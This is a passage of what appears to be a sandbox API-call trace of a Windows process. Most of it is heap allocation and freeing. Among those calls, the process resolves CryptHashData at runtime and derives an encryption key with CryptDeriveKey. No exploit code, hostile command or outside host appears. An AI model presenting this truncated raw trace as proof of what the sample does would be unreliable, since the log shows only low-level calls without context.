dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.265] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0195.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x24a9d98, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.266] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0195.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0195.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0195.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0195.267] CryptHashData (hHash=0xaa58a0, pbData=0x24b1748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d98 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0195.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0195.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0195.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0195.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0195.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0195.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0195.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0195.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0195.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0195.270] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0195.271] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0195.271] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0195.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0195.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.271] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0195.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.272] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.272] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.272] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.272] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.272] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.272] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.272] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0195.273] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0195.273] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0195.273] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0195.273] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.273] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0195.273] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0195.273] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.274] CryptDeriveKey (in: hProv=0xad6150, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5820) returned 1 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f00 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0195.274] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.274] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0195.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa008 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0195.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.275] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0195.275] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0195.276] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0195.276] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.276] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0195.276] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0195.276] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c08 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1bc8 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.276] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0195.276] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1bc8 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0195.277] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0195.277] RtlAllocateHeap (HeapHandle=0x25c0000, 